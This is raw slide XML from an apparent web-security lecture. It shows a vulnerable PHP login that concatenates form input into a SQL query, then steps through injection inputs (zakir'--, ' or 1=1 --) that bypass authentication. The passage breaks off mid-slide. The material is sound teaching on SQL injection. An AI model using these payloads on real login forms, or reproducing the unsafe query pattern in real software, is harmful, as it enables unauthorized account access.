            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21005800" cy="8137284"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>$u = $_POST['login’]; // </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="114395"/>
                    <a:lumOff val="-24975"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>zakir</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>$pp = $_POST['password']; // </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="114395"/>
                    <a:lumOff val="-24975"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>123</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$sql = "SELECT id FROM users WHERE uid = '$u' AND pwd = '$p'”;  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$rs = $db-&gt;executeQuery($sql);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>if $rs.count &gt; 0 {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>   // success</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>}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chemeClr val="accent6">
            <a:hueOff val="-146070"/>
            <a:satOff val="-10048"/>
            <a:lumOff val="-30626"/>
          </a:scheme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Cross-Site Request Forgery (CSRF)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726440">
              <a:defRPr sz="14960">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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/>
            <a:r>
              <a:t>Cross-Site Request Forgery (CSRF)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Non-Malicious Inpu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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Non-Malicious Input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="$u = $_POST['login’]; // zakir…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21005800" cy="8137284"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>$u = $_POST['login’]; // </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="114395"/>
                    <a:lumOff val="-24975"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>zakir</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>$pp = $_POST['password']; // </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="114395"/>
                    <a:lumOff val="-24975"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>123</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$sql = "SELECT id FROM users WHERE uid = '$u' AND pwd = '$p'”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="114395"/>
                    <a:lumOff val="-24975"/>
                  </a:schemeClr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t>//     "SELECT id FROM users WHERE uid = 'zakir' AND pwd = '123'”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$rs = $db-&gt;executeQuery($sql);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>if $rs.count &gt; 0 {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>   // success</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>}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Bad Inpu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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Bad Input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="$u = $_POST['login’]; // zakir…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21735528" cy="9081109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>$u = $_POST['login’]; // </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="114395"/>
                    <a:lumOff val="-24975"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>zakir</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>$pp = $_POST['password']; // </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="114395"/>
                    <a:lumOff val="-24975"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>123</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$sql = "SELECT id FROM users WHERE uid = '$u' AND pwd = '$p'”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="114395"/>
                    <a:lumOff val="-24975"/>
                  </a:schemeClr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t>//     "SELECT id FROM users WHERE uid = 'zakir' AND pwd = '123</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:t>'”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$rs = $db-&gt;executeQuery($sql);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr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t>//    SQL Syntax Error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>if $rs.count &gt; 0 {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>   // success</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>}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Malicious Inpu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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Malicious Input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="$u = $_POST['login']; // zakir'--…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21735528" cy="9081109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>$u = $_POST['login']; // </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="114395"/>
                    <a:lumOff val="-24975"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>zakir</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>$pp = $_POST['password']; // </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="114395"/>
                    <a:lumOff val="-24975"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>123</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$sql = "SELECT id FROM users WHERE uid = '$u' AND pwd = '$p'”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:hueOff val="114395"/>
                    <a:lumOff val="-24975"/>
                  </a:schemeClr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t>//     "SELECT id FROM users WHERE uid = 'zakir</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="5E5E5E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- AND pwd…</a:t>
            </a:r>
            <a:r>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$rs = $db-&gt;executeQuery($sql);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:hueOff val="914337"/>
                    <a:satOff val="31515"/>
                    <a:lumOff val="-30790"/>
                  </a:schemeClr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t>//    (No Error)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>if $rs.count &gt; 0 {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>   // </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:hueOff val="914337"/>
                    <a:satOff val="31515"/>
                    <a:lumOff val="-30790"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Success!</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>}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No Username Needed!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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>No Username Needed!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="$u = $_POST['login’]; // ' or 1=1 --…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21735528" cy="9081109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>$u = $_POST['login’]; //</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumOff val="-29866"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t> ' or 1=1 --</a:t>
            </a:r>
            <a:endParaRPr b="0">
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4200">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
